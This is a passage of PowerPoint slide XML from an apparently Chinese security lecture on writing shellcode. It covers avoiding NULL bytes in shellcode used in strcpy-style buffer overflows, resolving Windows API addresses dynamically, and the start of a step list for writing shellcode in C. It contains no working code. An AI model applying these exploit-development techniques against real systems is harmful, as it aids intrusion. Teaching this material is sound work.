                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。比如，对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>等函数造成的缓冲区溢出，会认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>是字符串的终结，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>中不能有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，如果有需要则要进行变通或编码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE6B32F-5EE3-4631-9D5B-8F05400AA12E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8077158" y="2744919"/>
            <a:ext cx="1622946" cy="1622946"/>
            <a:chOff x="2716147" y="2106202"/>
            <a:chExt cx="1622946" cy="1622946"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="is1ide-Oval 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C118987-D8F5-45CC-89F7-151C66890234}"/>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latin typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="组合 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB3935C1-0534-484F-8AE9-979D27D31D4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2828972" y="2219027"/>
              <a:ext cx="1397296" cy="1397296"/>
              <a:chOff x="2696934" y="2774952"/>
              <a:chExt cx="1035027" cy="1035027"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="is1ide-Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E1D0CC8-7E79-4682-8B13-4EEABCBD11AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2696934" y="2774952"/>
                <a:ext cx="1035027" cy="1035027"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="1092F1"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
                <a:normAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="矩形 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1321BC3-7416-4A4F-BB60-01D0286CA5FA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2889315" y="3127087"/>
                <a:ext cx="650261" cy="29637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b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45061A9C-1285-4836-94BC-7D1331D62520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429375" y="4541663"/>
            <a:ext cx="5688632" cy="2303211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的定位很困难</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。比如，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>系统下，系统调用多数都是封装在高级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>中来调用的，而且不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Service Pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>或版本的操作系统其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>都可能有所改动，所以不可能直接调用。因此，需要采用动态的方法获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>地址。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2245194230"/>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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="98"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="49" presetClass="entr" presetSubtype="0" decel="10000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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="360"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>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par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetID="49" presetClass="entr" presetSubtype="0" decel="100000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="360"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>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31" grpId="0"/>
      <p:bldP spid="3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269135" y="837929"/>
            <a:ext cx="4320480" cy="474140"/>
            <a:chOff x="4269135" y="837929"/>
            <a:chExt cx="4320480" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="55" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF07046-8558-4F68-A567-BFF83801B119}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269135" y="1312069"/>
              <a:ext cx="4320480"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4500001" y="837929"/>
              <a:ext cx="3858750" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>简单的编写</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Shellcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="矩形 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6043767-DC6B-4254-9127-2CD5CBDB1CF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1379381" y="1456085"/>
            <a:ext cx="10099988" cy="499432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0050A3"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>简单的编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0050A3"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0050A3"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的步骤如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832A7433-295D-472A-8920-856B4D551924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2108895" y="2176165"/>
            <a:ext cx="4896544"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Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>第一步：用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>语言书写要执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
